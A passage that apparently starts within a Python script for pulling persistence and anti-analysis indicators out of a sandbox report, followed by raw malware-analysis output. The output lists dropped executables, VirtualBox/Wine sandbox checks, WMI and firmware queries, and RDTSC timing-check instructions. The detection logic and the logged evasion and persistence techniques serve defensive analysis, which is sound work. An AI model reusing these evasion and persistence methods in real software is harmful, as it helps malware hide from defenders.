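            if key.lower().endswith(r"\currentversion\run"):
                run_values.setdefault((key, value, source))
        elif event == "Process created" and "schtasks" in detail.lower() and "/create" in detail.lower():
            tasks.append(parse_schtasks(detail))
        elif event == "File created" and detail.lower().endswith(".job"):
            job_files.append(detail)
    return {"probes": probes, "run_values": list(run_values), "tasks": tasks, "job_files": job_files}


def findings(iocs):
    """Turn extracted IOCs into alert strings (assumed heuristics, not the sandbox's own scoring)."""
    alerts = []
    for source, names in iocs["probes"].items():
        alerts.append(f"anti-analysis: {source} probed {len(names)} monitor window class(es)")
    for _key, value, writer in iocs["run_values"]:
        if TEMP_DIR_RE.search(writer):  # autostart entry written by a process living in %TEMP%
            alerts.append(f"persistence: Run value '{value}' written from %TEMP% by {writer}")
    for t in iocs["tasks"]:
        action = (t["action"] or "").lower()
        if "mshta" in action and ".hta" in action:
            alerts.append(f"persistence: task '{t['name']}' runs mshta on an HTA every {t['interval']} {t['schedule']}(s)")
    for job in iocs["job_files"]:
        alerts.append(f"persistence: legacy task job file {job}")
    return alerts


if __name__ == "__main__":
    for alert in findings(extract_iocs(SAMPLE_LINES)):
        print(alert)
```

Feeding the script the report's own lines instead of the constructed sample works as long as the "Source: <path> <event>: <detail>" shape survives; if a raw extraction has glued the path onto the event name, the pattern still splits them because it allows zero whitespace between the two.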
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\spoolsv.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_29-22759
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4EE5FA second address: 4EE613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 je 00007F4C28D8B356h 0x0000000c popad 0x0000000d je 00007F4C28D8B35Ch 0x00000013 js 00007F4C28D8B356h 0x00000019 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4EE613 second address: 4EE623 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D038Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4EE9F6 second address: 4EE9FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0810 second address: 4F0845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C288D038Dh 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ebx 0x00000010 pushad 0x00000011 jmp 00007F4C288D038Dh 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pop ebx 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jns 00007F4C288D0386h 0x00000025 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0898 second address: 4F089E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F09F4 second address: 4F0A21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F4C288D038Ah 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F4C288D0390h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push ecx 0x00000017 push esi 0x00000018 pop esi 0x00000019 pop ecx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0A21 second address: 4F0A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4C28D8B369h 0x00000012 rdtsc
